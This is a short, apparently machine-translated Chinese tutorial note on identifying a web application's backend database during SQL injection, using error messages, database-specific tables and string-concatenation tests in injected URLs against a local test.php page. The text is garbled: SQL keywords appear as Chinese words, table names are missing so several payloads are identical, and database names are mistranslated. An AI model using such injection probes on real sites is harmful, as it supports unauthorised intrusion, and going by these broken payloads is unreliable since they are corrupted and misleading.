后台数据库类型判断:
一、通过页面返回的报错信息,一般情况下页面报错会显示是什么数据库类型,在此不多说;
二,通过各个数据库特有的数据表来判断:
,,,, 1,该数据库
,,,,,http://127.0.0.1/test.php?id=1 以及(select count(*))在0和1=1
,,,, 2,访问数据库
,,,,,http://127.0.0.1/test.php?id=1 (select count(*))在0和1=1
,,,, 3, mysql数据库(mysql版本在5.0以上)
,,,,,http://127.0.0.1/test.php?id=1 以及(select count(*))在0和1=1
,,,, 4,甲骨文数据库
,,,,,http://127.0.0.1/test.php?id=1 以及(select count(*))在0和1=1
三,通过各数据库特有的连接符判断数据库类型:
,,,, 1,该数据库
,,,,, http://127.0.0.1/test.php?id=1 和' 1 ' ' 1 '=' 11 '
,,,, 2, mysql数据库
,,,,, http://127.0.0.1/test.php?id=1 和' 1 ' ' 1 '=' 11 '
,,,,, http://127.0.0.1/test.php?id=1 和(' 1 ',' 1 ')=?1”
,,,, 3,甲骨文数据库
,,,,, http://127.0.0.1/test.php?id=1 和“1“1”=?1”
,,,,, http://127.0.0.1/test.php?id=1 和(' 1 ',' 1 ')=' 11 '
